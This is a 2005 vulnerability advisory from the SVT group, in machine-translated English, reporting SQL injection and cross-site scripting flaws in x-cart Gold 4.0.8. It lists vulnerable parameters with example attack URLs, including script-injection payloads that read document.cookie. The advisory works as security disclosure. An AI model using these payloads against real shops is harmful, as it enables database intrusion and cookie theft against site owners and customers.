xcartGold.txt

2005-08-14T00:00:00
ID PACKETSTORM:39364
Type packetstorm
Reporter svt.nukleon.us
Modified 2005-08-14T00:00:00

Description

                                        
                                            `  
  
SVadvisory#7  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Title: Multiple vulnerabilities in x-cart Gold   
The program: x-cart Gold   
The vulnerable version: 4.0.8   
Homepage: www.x-cart.com   
Vulnerability is found: 29.05.05   
Has found: CENSORED / SVT / www.svt.nukleon.us   
=====================================================================   
The description.   
  
SQL - injections   
---------------   
At research of a product the set Multiple vulnerabilities was revealed   
SQL-Injections. Vulnerability mentions practically all parameters.   
The first mistake has been found in parameter "cat". In a script   
There is no check of this parameter and at substitution of a symbol   
"'" Probably, to make SQL-an injection. Further the mistake has been   
found in Parameter "productid" as from - for absence of check on   
Special symbols, by transfer to this parameter of a symbol "'" occurs   
Mistake SQL, and script forwards automatically on page   
Speaking about a mistake. On this page the parameter "id" is visible to it   
We transfer a symbol "'" and as probably to make SQL - an injection.   
Further we look parameter "mode", at substitution Special symbols   
There is a mistake and probably to make SQL - an injection. We shall wound   
And parameter "section" in it it is possible to make SQL - an injection.   
  
XSS   
---------------   
Vulnerability of type XSS can make in the same parameters as at mistakes   
SQL - injections   
=====================================================================  
Example  
^^^^^^^^^  
SQL - injections  
---------------  
http://example/home.php?cat='[SQL-inj]  
http://example/home.php?printable='[SQL-inj]  
http://example/product.php?productid='[SQL-inj]  
http://example/product.php?mode='[SQL-inj]  
http://example/error_message.php?access_denied&id='[SQL-inj]  
http://example/help.php?section='[SQL-inj]  
http://example/orders.php?mode='[SQL-inj]  
http://example/register.php?mode='[SQL-inj]  
http://example/search.php?mode='[SQL-inj]  
http://example/giftcert.php?gcid='[SQL-inj]  
http://example/giftcert.php?gcindex='[SQL-inj]  
  
XSS  
---------------  
http://example/home.php?cat='><script>alert(document.cookie)</script>  
http://example/home.php?printable='><script>alert(document.cookie)</script>  
http://example/product.php?productid='><script>alert(document.cookie)</script>  
http://example/product.php?mode='><script>alert(document.cookie)</script>  
http://example/error_message.php?access_denied&id='><script>alert(document.cookie)</script>  
http://example/help.php?section='><script>alert(document.cookie)</script>  
http://example/orders.php?mode='><script>alert(document.cookie)</script>  
http://example/register.php?mode='><script>alert(document.cookie)</script>  
http://example/search.php?mode='><script>alert(document.cookie)</script>  
http://example/giftcert.php?gcid='><script>alert(document.cookie)</script>  
http://example/giftcert.php?gcindex='><script>alert(document.cookie)</script>  
=====================================================================  
  
  
The conclusion.   
^^^^^^^^^^^   
Researches made only on version 4.0.8. Other versions as   
Can be vulnerable. The manufacturer in popularity is put. If is   
What that remarks write on censored@mail.ru   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Search Vulnerabilities Team / www.svt.nukleon.us /  
CENSORED | Cash | Fredy | patr0n | Loader |  
___  
___ / /  
____________\__\___ / /  
| _______________// _/_  
____|__________ |\ \/ | |  
/__________________| \____/ |  
___| |___  
|___ ___|  
| |___  
|_______|  
`